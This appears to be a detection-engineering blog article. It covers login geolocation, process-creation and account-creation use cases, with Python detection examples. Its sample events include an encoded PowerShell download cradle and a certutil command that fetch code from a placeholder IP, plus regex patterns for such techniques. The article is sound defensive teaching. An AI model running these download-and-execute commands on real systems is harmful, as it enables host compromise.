3 Effective Detection Use Cases for Identifying and Mitigating Threats
In today’s digital landscape, where the number, speed and sophistication of cyber threats are constantly increasing, security teams must be able to quickly identify and respond to threats or breaches while minimizing the impact of a security incident on the organization.
One way to achieve this is through detection engineering: designing and implementing the systems and processes that identify potential threats or breaches and alert security staff to them. These systems continuously monitor for signs of compromise or unusual activity and raise an alert when a potential threat is detected. The goal of detection engineering is an automated threat-detection capability that is customizable, flexible, repeatable, and produces high-quality alerts that security teams can act upon. This is critical in helping organizations protect their systems, data, and assets from cyber threats and minimize the impact of a security incident.
Detection engineering also depends on good asset management: you cannot alert on unexpected activity involving a host or account you do not know exists. An effective asset management strategy involves maintaining a comprehensive inventory of all assets, continuously monitoring and tracking those assets, and being able to quickly detect and respond to any potentially unauthorized activity. By doing so, an organization can proactively identify and mitigate threats, which minimizes the potential impact of a breach and protects the organization's assets and data.
Here are three examples of detection use cases that are typically effective at identifying and defending against malicious activity, along with the ATT&CK tactic that the adversary behavior in each case falls under:
Anomalous login geolocation
Tactic: Initial Access
Threat actors may use compromised credentials to gain unauthorized access to systems and resources within a network. They may use these credentials to bypass security controls and gain initial access, maintain persistence, escalate privileges, or evade detection. Compromised credentials may also allow them to remotely access systems and services such as VPNs, Outlook Web Access, network devices, and remote desktop for prolonged periods of time.
Unusual login times or locations can be useful indicators of a potential security breach, of problems with account access or authentication processes, and of inefficiencies in business operations. A user's apparent location can be disguised by a compromised server, a VPN, or a proxy, so geolocation alone is not conclusive; it is still a useful signal, however, in two forms: a login from a country the user has never authenticated from before, and two logins for the same account that are too far apart in too short a time for one person to have travelled between them ("impossible travel").
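The two checks just described, run over a handful of constructed login events, as an added example that is not part of the original article. It assumes the authentication logs have already been enriched with a GeoIP country and approximate coordinates, and it uses made-up users, IP addresses, baseline countries and a VPN egress address; the 900 km/h threshold is an assumption (roughly the speed of a commercial flight).

```python
from datetime import datetime
from math import asin, cos, radians, sin, sqrt

# Constructed sample of successful authentication events (not real data), already
# enriched with a GeoIP country code and approximate city-centre coordinates.
SAMPLE_LOGINS = [
    {"user": "alice", "ts": "2024-03-04T08:02:11Z", "src_ip": "203.0.113.10", "country": "GB", "lat": 51.51, "lon": -0.13},
    {"user": "alice", "ts": "2024-03-04T08:49:40Z", "src_ip": "198.51.100.7", "country": "SG", "lat": 1.35, "lon": 103.82},
    {"user": "bob", "ts": "2024-03-04T09:00:00Z", "src_ip": "192.0.2.5", "country": "US", "lat": 40.71, "lon": -74.01},
    {"user": "bob", "ts": "2024-03-04T17:30:00Z", "src_ip": "192.0.2.99", "country": "US", "lat": 34.05, "lon": -118.24},
    {"user": "carol", "ts": "2024-03-04T03:15:00Z", "src_ip": "203.0.113.200", "country": "BR", "lat": -23.55, "lon": -46.63},
    {"user": "dave", "ts": "2024-03-04T10:00:00Z", "src_ip": "192.0.2.40", "country": "US", "lat": 40.71, "lon": -74.01},
    {"user": "dave", "ts": "2024-03-04T10:20:00Z", "src_ip": "198.51.100.200", "country": "NL", "lat": 52.37, "lon": 4.90},
]

# Constructed per-user baseline: countries each user authenticated from over a prior period.
BASELINE_COUNTRIES = {"alice": {"GB"}, "bob": {"US"}, "carol": {"DE"}, "dave": {"US"}}

# Constructed egress address of the corporate VPN. Logins from it carry the VPN
# concentrator's location rather than the user's, so they are excluded from both checks.
KNOWN_VPN_EGRESS = {"198.51.100.200"}

# Assumed threshold: faster than a commercial airliner implies two actors or a proxy.
MAX_PLAUSIBLE_KMH = 900


def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two points in kilometres."""
    earth_radius_km = 6371.0
    dlat = radians(lat2 - lat1)
    dlon = radians(lon2 - lon1)
    a = sin(dlat / 2) ** 2 + cos(radians(lat1)) * cos(radians(lat2)) * sin(dlon / 2) ** 2
    return 2 * earth_radius_km * asin(sqrt(a))


def detect_anomalous_logins(events, baseline, known_vpn_egress=frozenset(), max_kmh=MAX_PLAUSIBLE_KMH):
    """Return alerts for (a) logins from a country outside the user's baseline and
    (b) consecutive logins whose implied travel speed exceeds max_kmh."""
    alerts = []
    last_by_user = {}
    for ev in sorted(events, key=lambda e: (e["user"], parse_ts(e["ts"]))):
        user = ev["user"]
        if ev["src_ip"] in known_vpn_egress:
            continue  # location is the VPN's, not the user's; do not anchor travel on it
        if ev["country"] not in baseline.get(user, set()):
            alerts.append({"user": user, "rule": "new_country", "country": ev["country"],
                           "src_ip": ev["src_ip"], "ts": ev["ts"]})
        prev = last_by_user.get(user)
        if prev is not None:
            km = haversine_km(prev["lat"], prev["lon"], ev["lat"], ev["lon"])
            hours = (parse_ts(ev["ts"]) - parse_ts(prev["ts"])).total_seconds() / 3600
            if hours > 0:
                kmh = km / hours
            else:
                kmh = float("inf") if km > 0 else 0.0  # same-second logins from one place are fine
            if kmh > max_kmh:
                alerts.append({"user": user, "rule": "impossible_travel", "from_ip": prev["src_ip"],
                               "to_ip": ev["src_ip"], "km": round(km), "hours": round(hours, 2), "kmh": round(kmh)})
        last_by_user[user] = ev
    return alerts


if __name__ == "__main__":
    for alert in detect_anomalous_logins(SAMPLE_LOGINS, BASELINE_COUNTRIES, KNOWN_VPN_EGRESS):
        print(alert)
```

In the sample, alice's London-to-Singapore hop in under an hour fires both rules, bob's New York-to-Los Angeles day is well under the threshold, carol trips only the baseline check, and dave's second login is suppressed because it comes from the known VPN egress. In production the baseline and VPN list would come from the identity provider and network inventory rather than constants, and the country check should be tuned for travelling staff before it pages anyone.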
Suspicious file or process activity on a host
Tactic: Execution
Threat actors may use legitimate system tools and commands to blend in with regular system activity and evade detection. A user may inadvertently download a malicious file disguised as a legitimate program, which may then install and execute remote access scripts, a backdoor, ransomware, spyware, adware, or other malicious software.
During the execution phase of an attack, the threat actor’s code is attempting to run. This code may be paired with techniques from other tactics to achieve broader goals, such as probing a network or stealing data. It is important to detect this activity because identifying and blocking unauthorized access to one host may prevent the compromise of multiple systems.
During the execution phase of an attack, threat actors may use command and script interpreters such as PowerShell and the Windows or Unix command shell to run commands, scripts, or binaries. To detect this activity, monitor process-creation events for command-line arguments that launch scripts, together with the behavior that follows: network and system information discovery, data collection, or other script-driven post-compromise actions that point back to the originating script. Depending on what monitoring is in place, these scripts will leave events of varying detail on the system.
To detect malicious or suspicious files, you can use signature-based, behavior-based, and heuristic detection. Signature-based detection matches files against a database of known malicious software "signatures"; behavior-based detection monitors what programs do and flags suspicious activity; heuristic detection uses algorithms to identify patterns typical of malicious software. No single method is foolproof, so it is best to combine these techniques.
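A behavior-based rule set over process-creation events, run against constructed sample events, as an added example that is not part of the original article. It assumes the telemetry exposes the image path, parent image path, command line and user (the fields a Sysmon-style process-creation event carries); the sample events, payload, IP address and rule thresholds are all made up.

```python
import base64
import re
from pathlib import PureWindowsPath

# Parents that should never spawn a shell or script host in most environments.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Substrings characteristic of download-and-execute behaviour, including living-off-the-land
# binaries used as downloaders. Case-insensitive; applied to the command line and to any
# decoded -EncodedCommand payload.
CRADLE_PATTERNS = re.compile(
    r"(downloadstring|downloadfile|invoke-expression|\biex\b|net\.webclient|invoke-webrequest|"
    r"\biwr\b|certutil.*-urlcache|bitsadmin.*/transfer|mshta\s+https?://)",
    re.I,
)
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -enc, ...), so match the
# prefix and then require a base64-looking argument.
ENCODED_FLAG = re.compile(r"(?:^|\s)-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.I)
HIDDEN_WINDOW = re.compile(r"-w[a-z]*\s+hidden", re.I)

# Constructed sample payload and events (not real telemetry).
_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/stage.ps1')"
_ENC = base64.b64encode(_PAYLOAD.encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    {   # 0: a document macro launching hidden, encoded PowerShell that downloads a stager
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "CommandLine": f"powershell.exe -nop -w hidden -enc {_ENC}",
        "User": "CORP\\jdoe",
    },
    {   # 1: an administrator running an ordinary maintenance script from a console
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\rotate-logs.ps1",
        "User": "CORP\\ops-admin",
    },
    {   # 2: certutil abused as a downloader
        "Image": r"C:\Windows\System32\certutil.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"certutil.exe -urlcache -split -f http://203.0.113.5/t.exe C:\Users\Public\t.exe",
        "User": "CORP\\jdoe",
    },
]


def basename(path):
    return PureWindowsPath(path).name.lower()


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None  # the flag matched something that was not a real encoded command


def evaluate_process_event(ev):
    """Return the names of the rules that fire for one process-creation event."""
    hits = []
    image, parent, cmdline = basename(ev["Image"]), basename(ev["ParentImage"]), ev["CommandLine"]
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        hits.append("encoded_powershell")
    if CRADLE_PATTERNS.search(cmdline + " " + (decoded or "")):
        hits.append("download_cradle")
    if parent in OFFICE_PARENTS and image in INTERPRETERS:
        hits.append("office_spawns_interpreter")
    if image in {"powershell.exe", "pwsh.exe"} and HIDDEN_WINDOW.search(cmdline):
        hits.append("hidden_window")
    return hits


def triage_process_events(events):
    """Return (user, image, hits) for every event that fired at least one rule."""
    return [(ev["User"], basename(ev["Image"]), hits)
            for ev in events if (hits := evaluate_process_event(ev))]


if __name__ == "__main__":
    for row in triage_process_events(SAMPLE_EVENTS):
        print(row)
```

Decoding the encoded command before pattern matching is the part worth copying: the raw command line of event 0 contains none of the cradle keywords, and a rule that only inspects the visible arguments would miss it. The maintenance script in event 1 fires nothing, which is the false-positive check a rule like this needs before deployment.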
User accounts created by a privileged user
Tactic: Persistence
Threat actors may leverage their access to a privileged user account, such as an administrator account, to create an additional account on a victim system to maintain access without the need to use persistent remote access tools, which are often easily detected and flagged as suspicious. By using a secondary account, they can continue to have access to the system without drawing as much attention to their activities. This can also allow them to maintain access even if their primary method of access is discovered or blocked.
To detect this type of activity, you can monitor executed commands and arguments for actions related to account creation, such as net user or useradd, and newly executed processes associated with account creation, such as net.exe. You can also audit accounts periodically to identify ones that may have been created by an unauthorized individual. Additionally, collect account-creation events centrally: Windows Security Event ID 4720 ("A user account was created") is logged by a domain controller for domain accounts and by the local machine for local accounts, and on Linux, useradd writes a syslog entry for each new account.
Although these detection use cases may not cover all potential threats, they can help monitor and prevent attacks at key stages in the attack chain.